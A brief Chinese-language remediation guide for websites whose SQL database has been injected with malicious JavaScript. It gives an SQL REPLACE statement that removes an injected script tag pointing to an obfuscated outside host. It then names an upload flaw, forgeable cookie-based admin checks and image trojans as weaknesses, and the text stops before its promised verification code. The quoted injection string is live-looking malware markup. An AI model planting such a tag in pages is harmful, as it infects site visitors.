sql数据库被挂马或插入JS木马的解决方案

    虽然，可以通过sql查询分析器执行批量代换，暂时解决被插入的js代码问题，然而不从根本上解决整个网站存在的漏洞，包括程序上和权限，那么黑客还是随时可以入侵你的网站数据库。

    在sql查询分析器里可以执行以下的代码批量替换js代码：

“
update 表名 set 字段名=replace(字段名,'<script src=http://c.n%75clear3.com/css/c.js></script>','') ”

    flymorn仔细检查了网站，发现网站存在几个安全问题：

    第一，网站存在上传漏洞；虽然，上传文件需要管理员身份验证，也对上传文件进行了文件格式的认证，但管理员身份验证采用了cookies，而cookies是可以被伪造的，而且如果上传了图片后，不对该文件的内容采取任何判断的话，那么图片木马也很有可能被上传。

    解决措施：1 删除上传文件功能（不太实际）；2 修改上传用户验证为session验证；3 对上传后的文件内容进行验证，如果是图片木马，则删除；可以参考以下的验证代码：